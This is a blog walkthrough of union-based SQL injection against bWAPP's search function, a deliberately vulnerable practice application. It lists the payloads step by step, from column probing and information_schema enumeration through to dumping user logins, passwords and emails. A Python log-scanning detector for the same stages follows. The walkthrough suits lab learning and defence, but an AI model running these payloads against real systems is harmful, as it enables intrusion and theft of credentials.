Tuesday, February 4, 2020

bWAPP SQL Injection Search Function

bWAPP includes a SQL Injection module whose GET search parameter is checked against a MySQL database. Our first test is to see whether we can create a TRUE condition in the SQL query.

a' or 1=1#

As you can see, we successfully injected our own SQL through the title parameter. Now let's find out how many columns the query returns.

a' order by 1#

This came back with a false result. What we are looking for is either a TRUE response or an error message saying 'unknown column number'.

a' order by 8#

Here is the result we are looking for. The unknown-column error at position 8 tells us that the query returns seven columns. Our next task is to identify which of those columns are visible in the page, since those are the ones we can extract data through.

a' union select 1,2,3,4,5,6,7 #

We can see that columns 2, 3, 4 and 5 are visible in the page. Let's inject some common MySQL functions and variables.

a' union select 1,2,@@version,4,5,6,7 #

This shows us the version of MySQL the server is running.

a' union select 1,database(),@@version,4,user(),6,7 #

Here we selected the database() function to get the current working database, the @@version variable for the server version, and the user() function for the current database user.

a' union select 1,concat(schema_name),3,4,5,6,7 FROM information_schema.schemata#

Now it is time to extract the database schema: this lists the name of every schema (database) on the server from information_schema.schemata.

a' union select 1,2,table_name,4,5,6,7 from INFORMATION_SCHEMA.TABLES where table_schema=database()#

Extract the tables in the current database.

a' union select 1,2,column_name,4,5,6,7 from INFORMATION_SCHEMA.COLUMNS where table_name='users' and table_schema=database()#

Extract the column names from the 'users' table.

a' union select 1,login,password,4,email,6,7 from users#

Select the login, email and password fields from the users table and dump the information.
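From the defender's side, the sequence above leaves a recognisable trail in the web server's access log: a tautology, ORDER BY column probing, then UNION SELECT against information_schema, all from one client. The following is an added example (not bWAPP code or the author's) that scans constructed access-log lines for exactly those stages; the path /sqli_1.php and the title parameter are assumed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style access-log lines (not real traffic). The payloads
# are URL-encoded forms of the probes walked through on this page.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Feb/2020:10:01:02 +0000] "GET /sqli_1.php?title=iron&action=search HTTP/1.1" 200 1823
10.0.0.9 - - [04/Feb/2020:10:01:10 +0000] "GET /sqli_1.php?title=a%27+or+1%3D1%23&action=search HTTP/1.1" 200 9911
10.0.0.9 - - [04/Feb/2020:10:01:15 +0000] "GET /sqli_1.php?title=a%27+order+by+8%23&action=search HTTP/1.1" 200 640
10.0.0.9 - - [04/Feb/2020:10:01:22 +0000] "GET /sqli_1.php?title=a%27+union+select+1,2,%40%40version,4,5,6,7+%23&action=search HTTP/1.1" 200 1201
10.0.0.9 - - [04/Feb/2020:10:01:30 +0000] "GET /sqli_1.php?title=a%27+union+select+1,2,table_name,4,5,6,7+from+INFORMATION_SCHEMA.TABLES+where+table_schema%3Ddatabase()%23&action=search HTTP/1.1" 200 1402
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Most specific rule first; the first match labels the decoded parameter value.
RULES = [
    ("union_schema", re.compile(r"union\s+(?:all\s+)?select\b.*information_schema\.", re.I | re.S)),
    ("union_select", re.compile(r"union\s+(?:all\s+)?select\b", re.I)),
    ("column_probe", re.compile(r"order\s+by\s+\d+", re.I)),
    ("tautology",    re.compile(r"'\s*or\s+\d+\s*=\s*\d+", re.I)),
]

def classify_value(value):
    """Return the injection stage label for one decoded parameter value, or None."""
    for label, pattern in RULES:
        if pattern.search(value):
            return label
    return None

def scan_log(log_text):
    """Return (client_ip, parameter_name, stage) for every suspicious query parameter."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected log format
        query = urlsplit(m.group("target")).query
        for name, values in parse_qs(query).items():  # parse_qs URL-decodes values
            for value in values:
                stage = classify_value(value)
                if stage:
                    findings.append((m.group("ip"), name, stage))
    return findings

def suspicious_clients(findings, min_stages=3):
    """Clients that progressed through at least `min_stages` distinct stages."""
    stages_by_ip = {}
    for ip, _, stage in findings:
        stages_by_ip.setdefault(ip, set()).add(stage)
    return sorted(ip for ip, stages in stages_by_ip.items() if len(stages) >= min_stages)

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print("escalating clients:", suspicious_clients(hits))
```

Requiring several distinct stages from one client before alerting keeps a single odd search term from paging anyone, while the full walkthrough on this page trips the threshold on its third request.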
